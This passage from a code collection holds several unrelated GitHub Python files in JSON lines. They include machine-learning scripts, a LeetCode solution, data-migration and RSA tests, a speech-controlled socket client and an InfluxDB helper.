as the label of this features vector, and all the tests that has\n# been taken more times than the chosen one - as the features. if a patient hasn't done a\n# certain test, it's value in the feature vector would be 0.\n\ntimes_taken = data[\"test id\"].value_counts() # ordered from top to bottom\nmore_common = times_taken[times_taken >= RARENESS]\n\nrare_test = np.array(more_common[-1:-2:-1].index) # the id str of the chosen rare test\ntests_array = np.array(more_common[:-1:].index) # all the id's of the tests that were taken\n# more often than the 'rare test' as keys\n\nX, y = pu.features_and_labels(data, rare_test, tests_array)\n\n# It is now time for training and testing! let us begin with putting 30% of the data aside for\n# testing, and keeping 70% for training\n\nn = np.shape(X)[0]\n\nX_tr = X[0:int(TR * n)]\nX_tst = X[int(TR * n):]\n\ny_tr = y[0:int(TR * n)]\ny_tst = y[int(TR * n):]\n\n# we would like to check, whether the y values could be any number within some limits, or if they\n# could only get the value of a discrete group of test results (i.e. a rational number between\n# [1,100] or an int in the group {0, 1, 2, 3, 4}).\n\n# in order to determine - we should use the threshold value 0.5 for repetitiveness of labels,\n# which effectively means:\nnum_of_unique_labels = len(np.unique(y))\nnum_of_labels = len(y)\ndiscrete = True if (num_of_unique_labels / num_of_labels) < 0.5 else False\n\n\nH = []\n# if the labels could only get few discrete values, we should obviously treat our problem as a\n# classification problem.\nif discrete:\n H.append(pu.logistic_regression(C, X_tr, y_tr))\n# otherwise - it should be treated as a regression problem\nelse:\n H.append(pu.lasso_regression(ALPHA, X_tr, y_tr))\n H.append(pu.linear_regression(X_tr, y_tr))\n\n\n# in order to check how well does the new hypothesis work, we shall calculate the error:\nfor h in H:\n tr_error = pu.loss_0_1(h, X_tr, y_tr)\n tst_error = pu.loss_0_1(h, X_tst, y_tst)\n print('training error: ', tr_error, ' test error: ', tst_error)\n\n\n","repo_name":"Tomer-Daloomi/test_project","sub_path":"predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"18409580315","text":"from crosskbmom import *\nfrom math import floor\n\nfrom sklearn.datasets import make_blobs\nfrom kbmom.utils import *\nimport matplotlib.pyplot as plt\n\n\ndef bloc_size(prop_outliers, cste):\n return floor(log(cste) / log(1 - prop_outliers))\n\n\ndef bloc_nb(R, prop_outliers, cste, nb=None):\n if nb is None:\n nb = bloc_size(prop_outliers, cste)\n D = cste - 1 / 2 # (1-prop_outliers)**nb - cste # #\n return floor(log(10 / R) / (2 * D ** 2))\n\n\nclass Simulation():\n\n MU = np.array([[1, 4], [2, 1], [-2, 3]])\n\n # parameters for the simulation\n n_samples = 1200\n nb_outliers = 10\n outlier_degree = 20\n repetitions = 15\n\n all_rmse = []\n\n # Main loop on the sub sample size\n for coef_ech in np.arange(30, 130, 10):\n print(coef_ech, end='*')\n # Repetitions\n rmse = []\n for j in range(repetitions):\n # data simulation\n X, y_true = make_blobs(n_samples=n_samples, centers=MU, cluster_std=0.4)\n for i in range(nb_outliers):\n X[i, :] = outlier_degree * X[i, :]\n\n kmom_cross = CrossKbMOM(K=len(MU), coef_ech=coef_ech, nbr_blocks=50)\n kmom_cross.fit(X)\n y_kmom = kmom_cross.predict(X)\n\n map_kmom = mapping(y_true[nb_outliers:], y_kmom[nb_outliers:])\n rmse.append(RMSE(MU, kmom_cross.centers, map_kmom))\n\n all_rmse.append(rmse)\n print('RMSE')\n for name, x in zip(np.arange(30, 130, 10), all_rmse):\n print('sample size ', name, 'rmse', np.round(np.mean(x), 2))\n #print('centroids')\n #print(kmom_cross.centers.astype(np.int))\n\n plt.figure(figsize=(15, 8))\n plt.subplot(121)\n plt.plot(X[:, 0], X[:,1], '.')\n plt.title('Example of simulation case')\n plt.subplot(122)\n plt.violinplot(all_rmse)\n plt.title('Influence of the sample size of the block')\n plt.show()\n\n @classmethod\n def main(cls):\n pass\n\n\nif __name__ == '__main__':\n Simulation.main()\n","repo_name":"csaumard/kbMOM","sub_path":"kbMOM/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"23"} +{"seq_id":"70414409020","text":"from ..bussiness_objects import AccountingGetter, ResponseDealer\n\n\nclass AccountingLogic:\n \"\"\"\n Логика получения БО.\n \"\"\"\n\n def get_accounting(self, inn: str, token: str) -> dict:\n \"\"\"\n Логика метода GET /accounting\n \"\"\"\n ag = AccountingGetter(inn, token)\n accounting = ag.from_db()\n dealer = ResponseDealer()\n if accounting:\n response = dealer.accounting(data=accounting)\n else:\n ag.task_parse()\n response = dealer.in_queue()\n return response\n","repo_name":"gagpa/ms_accounting","sub_path":"app/bussiness_logics/accounting_logic.py","file_name":"accounting_logic.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"74700403899","text":"import multiprocessing\nimport ijson\nimport pymysql\nimport os.path\nimport copy\nfrom handle_type import handle_data\nfrom handle_columns import translate_columns_name, handle_columns, _get_columns_default\nfrom conf import (\n translate_table_name,\n get_columns_type,\n get_columns_info,\n dump_data_dir,\n dump_data_file,\n ignore_tables,\n)\n\npath_name = \"\"\ntable_name = \"\"\nfile_name = \"\"\n\ncol_type = {}\ncol_info = {}\ncolumns_default = {}\n\nuser = \"root\"\npassword = \"root\"\nhost = \"localhost\"\ndatabase = \"test\"\n\ndb = pymysql.connect(user=user, password=password, host=host, database=database)\n\ntotal = 0\n\n\ndef sql_test(row):\n sql_cols = copy.deepcopy(col_type)\n row = translate_columns_name(file_name, row)\n diff_columns = handle_columns(row, col_info, col_type, sql_cols, columns_default)\n\n if diff_columns[1]:\n # print(diff_columns)\n # print(row)\n return diff_columns\n\n diff_types = handle_data(row, sql_cols)\n if diff_types:\n return (\"diff_types\", diff_types)\n\n sql = \"INSERT INTO {0}({1}) VALUES {2};\".format(\n table_name, \",\".join(row.keys()), tuple(row.values())\n )\n return sql\n\n\ndef test_columns(row):\n sql_cols = copy.deepcopy(col_type)\n row = translate_columns_name(file_name, row)\n diff_columns = handle_columns(row, col_info, col_type, sql_cols, columns_default)\n\n if diff_columns[1]:\n # print(diff_columns)\n # print(row)\n return diff_columns\n\n return row\n\n\ndef test_pool(rows):\n pool = multiprocessing.Pool()\n async_result = pool.imap(sql_test, rows)\n for row in async_result:\n yield row\n\n pool.close()\n\n\ndef init(fil_name):\n global total, path_name, table_name, col_type, col_info, file_name, columns_default\n file_name = fil_name\n total = 0\n\n path_name = os.path.join(dump_data_dir, file_name + \".json\")\n table_name = translate_table_name(file_name)\n col_type = get_columns_type(db, database, table_name)\n col_info = get_columns_info(db, database, table_name)\n columns_default = _get_columns_default(file_name)\n\n\ndef diff_of_type(diff_columns, sql_cols):\n return {column: sql_cols[column] for column in diff_columns}\n\n\ndiff_columns_total = 0\n\n\ndiff_columns = set()\ndiff_types = set()\nmore_columns = set()\n\n\ndef test():\n global total, diff_columns_total, diff_columns, diff_types, more_columns\n with open(path_name) as f:\n rows = ijson.items(f, \"results.item\")\n\n for row in test_pool(rows):\n # total += 1\n # print(file_name, \":\", total)\n if isinstance(row, tuple):\n if row[0] == \"diff_columns\":\n diff_columns_total += 1\n diff_columns |= row[1]\n elif row[0] == \"more_columns\":\n more_columns |= row[1]\n elif row[0] == \"diff_types\":\n diff_types |= row[1]\n continue\n\n # print(row)\n if not diff_columns and diff_types and more_columns:\n return False\n\n fi = \"*\" * 5 + file_name + \"*\" * 5 + \"\\n\"\n diff_info_fp.write(fi)\n diff_info_fp.write(\n \"{0}\\tdiff_columns: {1}\\n\".format(diff_columns_total, diff_columns)\n )\n diff_info_fp.write(\"more_columns: {0}\\n\".format(more_columns))\n diff_info_fp.write(\"diff_types: {0}\\n\".format(diff_types))\n diff_info_fp.write(str(diff_of_type(diff_columns, col_type)) + \"\\n\\n\")\n diff_info_fp.flush()\n\n\ndef test_all_dump_data():\n dir = os.listdir(dump_data_dir)\n bad_file_name = {}\n good_file_name = []\n for file_name in dir:\n file_name = file_name.split(\".\")[0]\n ignore_tables.extend(\n [\"GoldLog\", \"Message\", \"Coupon\", \"Order\", \"LeanEngineSniper\", \"_User\"]\n )\n # this is good\n ignore_tables.extend(\n [\n \"RechargeOrder\",\n \"Invoice\",\n \"WithdrawStatus\",\n \"BusinessHours\",\n \"MessageType\",\n \"BeefStatus\",\n \"LottoLog\",\n \"OffineControl\",\n \"MallOrderStatus\",\n \"WithdrawPyramid\",\n \"BeefPaymentType\",\n \"MallBanner\",\n \"BeefGoldLogType\",\n \"CashLogType\",\n \"GoldLogType\",\n \"GiftLog\",\n \"Alipay\",\n \"CreditsType\",\n \"MarketPrice\",\n \"CrowdProductUsers\",\n \"CouponRange\",\n \"CouponDispatch\",\n \"IncomeDetail\",\n \"Discover\",\n \"CommentBridge\",\n \"CrowdStatus\",\n \"Province\",\n \"OrderStatus\",\n \"Insurance\",\n \"MallPaymentType\",\n \"BankInfo\",\n \"CommodityType\",\n \"Retrospect\",\n \"BusinessInfo\",\n \"Beef\",\n \"LjStore\",\n \"Announcement\",\n \"City\",\n \"BeefCardSale\",\n \"wxAccessToken\",\n \"Cow\",\n ]\n )\n if file_name in ignore_tables:\n continue\n\n try:\n init(file_name)\n if not test():\n good_file_name.append(file_name)\n except Exception as e:\n # print('BAD',file_name)\n bad_file_name[file_name] = e\n continue\n\n diff_info_fp.write(\"BAD_file_name: \\n\")\n for i in bad_file_name:\n diff_info_fp.write(str(i) + \"\\n\")\n diff_info_fp.write(str(good_file_name))\n\n\ndef testcc():\n for file_name in [\"GoldLog\", \"Message\", \"Coupon\", \"Order\", \"LeanEngineSniper\",\"_User\"]:\n try:\n init(file_name)\n test()\n except:\n s = \"Bad: \" + file_name + \"\\ndiff_columns:\\n\" + str(diff_columns) + \"\\ndiff_types: \\n\" + str(diff_types)\n diff_info_fp.write(s)\n diff_info_fp.flush()\n\n\nif __name__ == \"__main__\":\n diff_info_fp = open(\"/home/pybeef/big_table\", \"a\")\n try:\n # test_all_dump_data()\n\n # init('_User')\n # test()\n testcc()\n finally:\n\n diff_info_fp.close()\n","repo_name":"Iceber/migrate_data","sub_path":"test_columns.py","file_name":"test_columns.py","file_ext":"py","file_size_in_byte":6289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"33231485613","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# GTFS config file for the 9 of 10 transitanalystisrael tools (TTM is seperate) \n#\n\nMAX_STOPS_COUNT = 100000\nMAX_STOP_TIMES_COUNT = 100000000\nMAX_TRIPS_COUNT = 2000000\nMAX_SHAPES_COUNT = 50000000\nMAX_ROUTES_COUNT = 100000\nMAX_AGENCY_COUNT = 200\nMAX_CALENDAR_COUNT = 1000000","repo_name":"transitanalystisrael/TransitAnalystIsrael","sub_path":"root/gtfs_config.py","file_name":"gtfs_config.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"42236586272","text":"\"\"\"\nWe are given some website visits: the user with name username[i] visited the\nwebsite website[i] at time timestamp[i].\n\nA 3-sequence is a list of websites of length 3 sorted in ascending order by\nthe time of their visits. (The websites in a 3-sequence are not necessarily\ndistinct.)\n\nFind the 3-sequence visited by the largest number of users. If there is more\nthan one solution, return the lexicographically smallest such 3-sequence.\n\n \n\nExample 1:\n\nInput: username =\n[\"joe\",\"joe\",\"joe\",\"james\",\"james\",\"james\",\"james\",\"mary\",\"mary\",\"mary\"],\ntimestamp = [1,2,3,4,5,6,7,8,9,10], website =\n[\"home\",\"about\",\"career\",\"home\",\"cart\",\"maps\",\"home\",\"home\",\"about\",\"career\"]\n\nOutput: [\"home\",\"about\",\"career\"]\n\nExplanation: \nThe tuples in this example are:\n[\"joe\", 1, \"home\"]\n[\"joe\", 2, \"about\"]\n[\"joe\", 3, \"career\"]\n[\"james\", 4, \"home\"]\n[\"james\", 5, \"cart\"]\n[\"james\", 6, \"maps\"]\n[\"james\", 7, \"home\"]\n[\"mary\", 8, \"home\"]\n[\"mary\", 9, \"about\"]\n[\"mary\", 10, \"career\"]\nThe 3-sequence (\"home\", \"about\", \"career\") was visited at least once by 2 users.\nThe 3-sequence (\"home\", \"cart\", \"maps\") was visited at least once by 1 user.\nThe 3-sequence (\"home\", \"cart\", \"home\") was visited at least once by 1 user.\nThe 3-sequence (\"home\", \"maps\", \"home\") was visited at least once by 1 user.\nThe 3-sequence (\"cart\", \"maps\", \"home\") was visited at least once by 1 user.\n \n\nNote:\n\n3 <= N = username.length = timestamp.length = website.length <= 50\n1 <= username[i].length <= 10\n0 <= timestamp[i] <= 10^9\n1 <= website[i].length <= 10\n\nBoth username[i] and website[i] contain only lowercase characters.\n\nIt is guaranteed that there is at least one user who visited at least 3\nwebsites.\n\nNo user visits two websites at the same time.\n\"\"\"\nfrom typing import List\nfrom collections import defaultdict\nfrom itertools import combinations\n\n\nclass Solution:\n \"\"\"\n This question has a list of annoying gotchas. One of the worst questions\n I have encountered.\n\n * timestamps are not necessarily monotonically increasing\n * if a user visits the same 3-sequence more than once, its counted as 1\n because the question states \"visited by the most number of users\"\n * a 3-sequence is not ADJACENT visits, its the set of all permutations\n of visits by monotonically increasing timestamp\n \"\"\"\n\n def mostVisitedPattern(\n self, username: List[str], timestamp: List[int], website: List[str]\n ) -> List[str]:\n # keyed by user\n visits = defaultdict(list)\n\n # keyed by 3 tuple of websites\n sequences = defaultdict(lambda: 0)\n\n for user, time, site in zip(username, timestamp, website):\n visit = (site, time)\n visits[user].append(visit)\n\n for k in visits.keys():\n # sort by timestamp\n visits[k].sort(key=lambda x: x[1])\n\n # set of 3-length monotonically increasing site visits\n perms = set(combinations([rec[0] for rec in visits[k]], 3))\n\n for seq in perms:\n sequences[seq] += 1\n\n # (count, (\"w1\", \"w2\", \"w3\"))\n results = [(v, k) for k, v in sequences.items()]\n results.sort(reverse=True)\n\n final = [results[0][1]]\n max_count = results[0][0]\n\n # break ties with lexographic sort\n for i in range(1, len(results)):\n if results[i][0] == max_count:\n final.append(results[i][1])\n else:\n break\n\n final.sort()\n\n return list(final[0])\n\n\ndef test_lc1():\n usernames = [\n \"joe\",\n \"joe\",\n \"joe\",\n \"james\",\n \"james\",\n \"james\",\n \"james\",\n \"mary\",\n \"mary\",\n \"mary\",\n ]\n timestamps = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n websites = [\n \"home\",\n \"about\",\n \"career\",\n \"home\",\n \"cart\",\n \"maps\",\n \"home\",\n \"home\",\n \"about\",\n \"career\",\n ]\n\n result = Solution().mostVisitedPattern(\n username=usernames, timestamp=timestamps, website=websites\n )\n\n assert result == [\"home\", \"about\", \"career\"]\n\n\ndef test_lc2():\n u = [\"dowg\", \"dowg\", \"dowg\"]\n t = [158931262, 562600350, 148438945]\n w = [\"y\", \"loedo\", \"y\"]\n\n results = Solution().mostVisitedPattern(u, t, w)\n\n assert results == [\"y\", \"y\", \"loedo\"]\n\n\ndef test_lc3():\n u = [\"zkiikgv\", \"zkiikgv\", \"zkiikgv\", \"zkiikgv\"]\n t = [436363475, 710406388, 386655081, 797150921]\n w = [\"wnaaxbfhxp\", \"mryxsjc\", \"oz\", \"wlarkzzqht\"]\n results = Solution().mostVisitedPattern(u, t, w)\n assert results == [\"oz\", \"mryxsjc\", \"wlarkzzqht\"]\n\n","repo_name":"jmoyers/competitive","sub_path":"season1/1152.py","file_name":"1152.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"23243674319","text":"from matplotlib import pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom statsmodels.formula.api import ols\r\nimport statsmodels.formula.api as smf\r\nfrom statsmodels.tsa.vector_ar.var_model import VAR\r\nfrom scipy import stats\r\nimport statsmodels.graphics.api as smg\r\n\r\ndef xylabel(a,b):\r\n plt.xlabel(a)\r\n plt.ylabel(b)\r\n plt.grid(axis='y')\r\n\r\ndef angle(x1, x2):\r\n lx1 = np.sqrt(x1.dot(x1))\r\n lx2 = np.sqrt(x2.dot(x2))\r\n return x1.dot(x2)/(lx1*lx2)\r\n\r\nurl = \"../新汇总表.csv\"\r\ncsv_data = pd.read_csv(url, engine='python')\r\n\r\nxaxis = \"years\"\r\nmodel = ols('Engel ~ I(np.log(gdp_per_capita/food_cpi))+I(1/(gdp_per_capita/food_cpi)**2)', csv_data).fit()\r\nprint(model.summary())\r\nresult1 = model.predict(csv_data)\r\n\r\nplt.figure(figsize=(8, 4))\r\nxaxis = \"years\"\r\nxylabel(xaxis, \"Engel coef\")\r\n\r\nplt.plot(csv_data[\"years\"],csv_data[\"Engel\"], \"v-\", label='Engel')\r\nplt.plot(csv_data[\"years\"],result1, \"o-\", label=\"predict Engel 6\")\r\nplt.legend()\r\nplt.savefig(\"../改进一.png\")\r\nplt.clf()\r\n","repo_name":"ggpipi/Master-s_thesis_code","sub_path":"statsss.py","file_name":"statsss.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"24179490431","text":"import speech_recognition as sr\nimport time\nimport socket\n\nHOST = '192.168.0.138'\nPORT = 9500\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((HOST, PORT))\nprint(\"Connection to \" + HOST + \" was successful\")\n\nword = ''\n# Record Audio\nwhile word != \"quit\":\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Say something!\")\n audio = r.listen(source)\n \n # Speech recognition using Google Speech Recognition\n try:\n # to use another API key, use `r.recognize_google(audio, key=\"GOOGLE_SPEECH_RECOGNITION_API_KEY\")`\n word = r.recognize_google(audio)\n print(\"You said: \" + word)\n if word == \"left\":\n print(\"LEFT\")\n word = word.encode()\n s.send(word)\n elif word == \"right\":\n print(\"RIGHT\")\n word = word.encode()\n s.send(word)\n elif word == \"shoot\":\n print(\"SHOOT\")\n word = word.encode()\n s.send(word)\n elif word == \"stop\" or word == \"quit\" or word == \"no\":\n word = \"STOP\"\n print(word)\n word = word.encode()\n s.send(word)\n break\n else:\n print(\"Not a command recognized by this program!\")\n except sr.UnknownValueError:\n print(\"Google Speech Recognition could not understand audio\")\n except sr.RequestError as e:\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\n except KeyboardInterrupt:\n print(\"resetting all\")","repo_name":"Rjbeckwith55/PythonProjects","sub_path":"PythonApplication1/Google_Speech_Recognition_Send.py","file_name":"Google_Speech_Recognition_Send.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"17592584187","text":"import random\n\nclass Musica:\n def __init__(self, titulo, artista, prev=None, next=None):\n self.titulo = titulo\n self.artista = artista\n self.prev = prev\n self.next = next\n\nclass Playlist:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def adc_mus(self):\n titulo = input(\"\\nNome da música: \")\n while not titulo.strip():\n print(\"\\n\\033[1;33;40mEntrada inválida. Tente novamente:\")\n print(\"\\nDeseja continuar ou voltar para o menu? (c/m)\")\n opc1 = input(\"\\n\\033[1;37;40mDigite sua opção: \")\n if opc1 == 'c':\n titulo = input(\"\\nNome da música: \")\n elif opc1 == 'm':\n print(\"\\n\\033[1;33;40mVoltando para o menu...\")\n return\n else:\n print(\"\\n\\033[1;31;40mOpção inválida!\") \n artista = input(\"\\nNome do artista: \")\n while not artista.strip():\n print(\"\\n\\033[1;33;40mEntrada inválida. Tente novamente:\")\n print(\"\\nDeseja continuar ou voltar para o menu? (c/m)\")\n opc2 = input(\"\\n\\033[1;37;40mDigite sua opção: \")\n if opc2 == 'c':\n artista = input(\"\\nNome do artista: \")\n elif opc2 == 'm':\n print(\"\\n\\033[1;33;40mVoltando para o menu...\")\n return\n else:\n print(\"\\n\\033[1;31;40mOpção inválida!\") \n new_node = Musica(titulo, artista)\n if not self.head:\n self.head = new_node\n self.tail = new_node\n else:\n new_node.prev = self.tail\n self.tail.next = new_node\n self.tail = new_node\n print(f\"\\n\\033[1;32;40m{titulo} - {artista} adicionada a playlist!\")\n\n def apg_mus(self):\n titulo = input(\"\\nNome da música: \")\n while not titulo.strip():\n print(\"\\n\\033[1;33;40mEntrada vazia. Tente Novamente:\")\n print(\"\\nDeseja continuar ou voltar para o menu? (c/m)\")\n opc3 = input(\"\\n\\033[1;37;40mDigite sua opção: \")\n if opc3 == 'c':\n titulo = input(\"\\nNome da música: \")\n elif opc3 == 'm':\n print(\"\\n\\033[1;33;40mVoltando para o menu...\")\n return\n else:\n print(\"\\n\\033[1;31;40mOpção inválida\") \n artista = input(\"\\nNome do artista: \")\n while not artista.strip():\n print(\"\\n\\033[1;33;40mEntrada vazia. Tente Novamente:\")\n print(\"\\nDeseja continuar ou voltar para o menu? (c/m)\")\n opc4 = input(\"\\n\\033[1;37;40mDigite sua opção: \")\n if opc4 == 'c':\n artista = input(\"\\nNome do artista: \")\n elif opc4 == 'm':\n print(\"\\n\\033[1;33;40mVoltando para o menu...\")\n return\n else:\n print(\"\\n\\033[1;31;40mOpção inválida!\") \n current_node = self.head\n while current_node:\n if current_node.titulo == titulo and current_node.artista == artista:\n if current_node.prev:\n current_node.prev.next = current_node.next\n else:\n self.head = current_node.next\n if current_node.next:\n current_node.next.prev = current_node.prev\n else:\n self.tail = current_node.prev\n print(f\"\\n\\033[1;31;40m{titulo} - {artista} deletada da playlist!\")\n return\n current_node = current_node.next\n print(\"\\n\\033[1;33;40mA música não está na playlist!\")\n\n def ver_playlist(self):\n if not self.head:\n print(\"\\n\\033[1;33;40mA playlist está vazia.\")\n return\n current_node = self.head\n print(\"\\n\\033[1;34;40mMúsicas na playlist:\")\n while current_node:\n print(f\"\\n\\033[1;32;40m{current_node.titulo} - {current_node.artista}\")\n current_node = current_node.next\n\n def shuffle(self):\n if not self.head:\n print(\"\\n\\033[1;33;40mA playlist está vazia!\")\n return\n musicas = []\n current_node = self.head\n while current_node:\n musicas.append(current_node)\n current_node = current_node.next\n random.shuffle(musicas)\n self.head = musicas[0]\n self.head.prev = None\n self.tail = musicas[-1]\n self.tail.next = None\n for i in range(len(musicas)-1):\n musicas[i].next = musicas[i+1]\n musicas[i+1].prev = musicas[i]\n print(\"\\n\\033[1;32;40mPlaylist embaralhada com sucesso!\")\n\n def busc_mus(self):\n buscar = input(\"\\nO que está procurando?: \")\n while not buscar.strip():\n print(\"\\n\\033[1;33;40mEntrada vazia! Tente novamente: \")\n print(\"\\nDeseja continuar ou voltar para o menu? (c/m)\")\n opc5 = input(\"\\n\\033[1;37;40mDigite sua opção: \")\n if opc5 == 'c':\n buscar = input(\"\\n\\033[1;37;40mO que está procurando?: \")\n elif opc5 == 'm':\n print(\"\\n\\033[1;33;40mVoltando para o menu...\")\n return\n print(\"\\n\\033[1;34;40mMúsicas na playlist:\")\n current_node = self.head\n if current_node == None: print(\"\\n\\033[1;33;40mA playlist está vazia!\")\n while current_node:\n if buscar in current_node.titulo or buscar in current_node.artista:\n print(f\"\\n\\033[1;32;40m{current_node.titulo} - {current_node.artista}\")\n current_node = current_node.next \n\ndef menu():\n print(\"\\n\\033[1;36;40m=====================================\")\n print(\" MENU:\")\n print(\"\\n1 - Adicionar música\")\n print(\"2 - Deletar música\")\n print(\"3 - Exibir playlist\")\n print(\"4 - Embaralhar playlist\")\n print(\"5 - Buscar na playlist\")\n print(\"6 - Sair do menu\")\n print(\"\\n=====================================\")\n\n while True:\n try:\n opc = int(input(\"\\n\\033[1;37;40mDigite o valor da sua opção: \"))\n if opc in range(1, 7):\n return opc\n print(\"\\n\\033[1;33;40mOpção inválida. Tente novamente.\")\n except ValueError:\n print(\"\\n\\033[1;33;40mEntrada inválida. Tente novamente.\")\n\nif __name__ == \"__main__\":\n playlist = Playlist()\n\nwhile True:\n opc = menu()\n if opc == 1:\n playlist.adc_mus()\n elif opc == 2:\n playlist.apg_mus()\n elif opc == 3:\n playlist.ver_playlist()\n elif opc == 4:\n playlist.shuffle()\n elif opc == 5:\n playlist.busc_mus() \n elif opc == 6:\n print(\"\\n\\033[1;34;40mAté a próxima!\")\n print(\"\\033[1;37;40m\")\n break ","repo_name":"NoemyT/Playlist_ed","sub_path":"Playlist_cd.py","file_name":"Playlist_cd.py","file_ext":"py","file_size_in_byte":6773,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"10008032351","text":"import unittest\nfrom tests_all import TestSentinelHub\n\nfrom sentinelhub.data_request import AwsTileRequest, AwsProductRequest\n\n\nclass TestAwsSafeTile(TestSentinelHub):\n @classmethod\n def setUpClass(cls):\n cls.request = AwsTileRequest(data_folder=cls.OUTPUT_FOLDER, tile='10UEV', bands=['B01', 'B09', 'B10'],\n metafiles='metadata,tileInfo', time='2016-01-09', safe_format=True)\n cls.request.save_data(redownload=True)\n cls.filename_list = cls.request.get_filename_list()\n\n def test_return_type(self):\n self.assertTrue(isinstance(self.filename_list, list), \"Expected a list\")\n self.assertEqual(len(self.filename_list), 4, \"Expected a list of length 4\")\n\n\nclass TestAwsSafeProduct(TestSentinelHub):\n @classmethod\n def setUpClass(cls):\n cls.request = AwsProductRequest(data_folder=cls.OUTPUT_FOLDER, bands='B01', safe_format=True,\n product_id='S2A_OPER_PRD_MSIL1C_PDMC_20160121T043931_R069_V20160103T171947_'\n '20160103T171947')\n cls.data = cls.request.get_data(redownload=True)\n\n def test_return_type(self):\n self.assertTrue(isinstance(self.data, list), \"Expected a list\")\n self.assertEqual(len(self.data), 125, \"Expected a list of length 125\")\n\n\nclass TestPartialAwsSafeProduct(TestSentinelHub):\n @classmethod\n def setUpClass(cls):\n bands = 'B12'\n metafiles = 'manifest,preview/B02, datastrip/*/metadata '\n tile = 'T1WCV'\n cls.request = AwsProductRequest(data_folder=cls.OUTPUT_FOLDER, bands=bands,\n metafiles=metafiles, safe_format=True, tile_list=[tile],\n product_id='S2A_MSIL1C_20171010T003621_N0205_R002_T01WCV_20171010T003615')\n cls.data = cls.request.get_data(save_data=True, redownload=True)\n\n def test_return_type(self):\n self.assertTrue(isinstance(self.data, list), \"Expected a list\")\n self.assertEqual(len(self.data), 3, \"Expected a list of length 3\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"weizushuai/sentinelhub-py","sub_path":"tests/test_aws_safe.py","file_name":"test_aws_safe.py","file_ext":"py","file_size_in_byte":2151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"23"} +{"seq_id":"72134293180","text":"from ...common import rsa\nimport unittest\nfrom os import path, remove\nfrom Crypto.PublicKey import RSA\n\nPUB_KEY_FILE = \"/tmp/key_file.pub\"\nPRIV_KEY_FILE = \"/tmp/key_file.priv\"\n\nclass RsaTest(unittest.TestCase):\n\n def setUp(self):\n \"\"\"Initiate keys.\"\"\"\n rsa.generate_keys(PUB_KEY_FILE, PRIV_KEY_FILE)\n\n def test_pub_key_format(self):\n \"\"\"verify public key format\"\"\"\n assert path.exists(PUB_KEY_FILE) == 1\n\n file = open(PUB_KEY_FILE, \"r\")\n lines = file.readlines()\n file.close()\n\n assert \"-----BEGIN PUBLIC KEY-----\" in lines[0]\n assert \"-----END PUBLIC KEY-----\" in lines[-1]\n\n def test_priv_key_format(self):\n \"\"\"verify private key format\"\"\"\n assert path.exists(PRIV_KEY_FILE) == 1\n\n file = open(PRIV_KEY_FILE, \"r\")\n lines = file.readlines()\n file.close()\n\n assert \"-----BEGIN RSA PRIVATE KEY-----\" in lines[0]\n assert \"-----END RSA PRIVATE KEY-----\" in lines[-1]\n\n\n def test_load_public_key(self):\n \"\"\"test load\"\"\"\n key = rsa.load_key(PUB_KEY_FILE)\n assert type(key) is RSA._RSAobj\n key = rsa.load_key(PRIV_KEY_FILE)\n assert type(key) is RSA._RSAobj\n\n def test_encrypt_decrypt(self):\n \"\"\"test encryption and decryption\"\"\"\n pub_key = rsa.load_key(PUB_KEY_FILE)\n priv_key = rsa.load_key(PRIV_KEY_FILE)\n message = b\"Hello this is a test\"\n encrypted_message = rsa.encrypt_public_key(message, pub_key)\n decrypted_message = rsa.decrypt_private_key(encrypted_message, priv_key)\n assert decrypted_message == message\n\n def test_sign_verify(self):\n \"\"\"test sign and verify_sign\"\"\"\n pub_key = rsa.load_key(PUB_KEY_FILE)\n priv_key = rsa.load_key(PRIV_KEY_FILE)\n message = b\"Hello this is a test\"\n signed_message = rsa.sign(priv_key, message)\n assert rsa.verify_sign(pub_key, signed_message, message)\n\n def setDown(self):\n \"\"\"remove temporary files.\"\"\"\n remove(PUB_KEY_FILE)\n remove(PRIV_KEY_FILE)\n","repo_name":"aussedatlo/pyticator","sub_path":"pyticator/tests/common/test_rsa.py","file_name":"test_rsa.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"39719284185","text":"import influxdb_client\nfrom influxdb_client.client.write_api import SYNCHRONOUS\nimport constants as C\n\ndef write(climate_variable, value):\n\n bucket = C.influxdb_bucket\n org = C.influxdb_org\n token = C.influxdb_token\n url = C.influxdb_url\n\n client = influxdb_client.InfluxDBClient(\n url=url,\n token=token,\n org=org\n )\n\n write_api = client.write_api(write_options=SYNCHRONOUS)\n \n p = influxdb_client.Point(\"measurement\").tag(\"location\", \"Hyderabad\").field(\n climate_variable, value)\n write_api.write(bucket=bucket, org=org, 